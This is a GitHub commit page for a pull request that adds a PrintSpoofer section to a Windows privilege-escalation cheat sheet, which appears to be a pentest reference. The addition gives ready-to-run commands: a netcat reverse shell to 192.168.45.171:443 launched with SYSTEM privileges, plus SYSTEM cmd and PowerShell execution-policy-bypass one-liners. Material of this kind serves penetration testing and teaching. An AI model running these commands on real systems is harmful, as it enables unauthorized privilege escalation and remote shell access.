Skip to content

Commit

Permalink
Merge pull request #696 from jenaye/PrintSpoofer
Browse files Browse the repository at this point in the history
[Add] - Priv esc windows (PrintSpoofer)
  • Loading branch information
swisskyrepo committed Nov 17, 2023
2 parents d93a228 + 4684fed commit bb71d4a
Showing 1 changed file with 16 additions and 0 deletions.
16 changes: 16 additions & 0 deletions Methodology and Resources/Windows - Privilege Escalation.md
Original file line number Diff line number Diff line change
Expand Up @@ -49,6 +49,7 @@
* [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
* [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))
* [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))
* [PrintSpoofer (Printer Bug)](#PrintSpoofer-Printer-Bug)))
* [EoP - Privileged File Write](#eop---privileged-file-write)
* [DiagHub](#diaghub)
* [UsoDLLLoader](#usodllloader)
Expand Down Expand Up @@ -1264,6 +1265,21 @@ JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juic
```


### PrintSpoofer (Printer Bug)

> this work if SeImpersonatePrivilege is enabled
* Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

```powershell
# run nc -lnvp 443 then :
.\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd"
# without listener
.\PrintSpoofer64.exe -i -c cmd
# Via RPD
.\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass"
```

## EoP - Privileged File Write

### DiagHub
Expand Down

0 comments on commit bb71d4a

Please sign in to comment.